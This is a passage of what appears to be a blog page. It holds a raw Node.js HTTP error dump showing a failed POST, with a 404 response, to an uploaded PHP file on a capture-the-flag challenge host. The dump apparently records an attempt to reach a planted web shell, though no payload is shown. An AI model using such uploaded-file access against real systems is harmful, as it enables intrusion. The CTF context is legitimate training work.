allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"statusCode":404,"statusMessage":"Not Found","trailers":{},"upgrade":false,"url":""},"response":null,"url":"http://8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show/uploads/20240213142923813.php","writable":true},"res":{"_consuming":false,"_dumped":false,"_events":{"error":[null,null]},"_eventsCount":3,"_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":false,"emitClose":true,"emittedReadable":false,"encoding":null,"endEmitted":true,"ended":true,"flowing":false,"highWaterMark":16384,"length":0,"needReadable":false,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":false,"readingMore":true,"resumeScheduled":false,"sync":true},"aborted":false,"client":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"complete":true,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"data":"","headers":{"connection":"close","content-encoding":"gzip","content-type":"text/html","date":"Tue, 13 Feb 2024 06:35:56 GMT","server":"nginx/1.20.1","transfer-encoding":"chunked"},"httpVersion":"1.1","httpVersionMajor":1,"httpVersionMinor":1,"method":null,"rawHeaders":["Server","nginx/1.20.1","Date","Tue, 13 Feb 2024 06:35:56 GMT","Content-Type","text/html","Transfer-Encoding","chunked","Connection","close","Content-Encoding","gzip"],"rawTrailers":[],"readable":false,"req":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":null,"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"socket":{"_events":{"close":[null,null]},"_eventsCount":6,"_hadError":false,"_handle":null,"_host":"8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show","_httpMessage":{"_contentLength":1786,"_ended":true,"_events":{},"_eventsCount":3,"_hasBody":true,"_header":"POST /uploads/20240213142923813.php HTTP/1.1\r\nHost: 8004d88f-8c75-4ab2-9a7b-c8c61c57b71e.challenge.ctf.show\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1786\r\nConnection: close\r\n\r\n","_headerSent":true,"_last":true,"_removedConnection":false,"_removedContLen":false,"_removedTE":false,"_trailer":"","agent":{},"chunkedEncoding":false,"connection":null,"finished":true,"maxHeadersCount":null,"method":"POST","output":[],"outputCallbacks":[],"outputEncodings":[],"outputSize":0,"parser":null,"path":"/uploads/20240213142923813.php","res":null,"sendDate":false,"shouldKeepAlive":false,"socket":null,"timeoutCb":null,"upgradeOrConnect":false,"useChunkedEncodingByDefault":true,"writable":true},"_parent":null,"_pendingData":null,"_pendingEncoding":"","_readableState":{"awaitDrain":0,"buffer":{"head":null,"length":0,"tail":null},"decoder":null,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"emittedReadable":false,"encoding":null,"endEmitted":false,"ended":false,"flowing":true,"highWaterMark":16384,"length":0,"needReadable":true,"objectMode":false,"pipes":null,"pipesCount":0,"readableListening":false,"reading":true,"readingMore":false,"resumeScheduled":false,"sync":false},"_server":null,"_sockname":null,"_writableState":{"bufferProcessing":false,"bufferedRequest":null,"bufferedRequestCount":0,"corked":0,"corkedRequestsFree":{"entry":null,"next":{"entry":null,"next":null}},"decodeStrings":false,"defaultEncoding":"utf8","destroyed":true,"emitClose":false,"ended":true,"ending":true,"errorEmitted":false,"finalCalled":true,"finished":true,"highWaterMark":16384,"lastBufferedRequest":null,"length":0,"needDrain":false,"objectMode":false,"pendingcb":0,"prefinished":true,"sync":false,"writecb":null,"writelen":0,"writing":false},"allowHalfOpen":false,"connecting":false,"parser":null,"readable":false,"server":null,"writable":false},"statusCode":404,"statusMessage":"Not Found","trailers":{},"upgrade":false,"url":""},"serverError":false,"status":404,"statusCode":404,"statusType":4,"type":"text/html","unauthorized":false,"unprocessableEntity":false},"status":404}
posted @ 2024-02-04 14:42  Guanz  阅读(185)  评论(0编辑  收藏  举报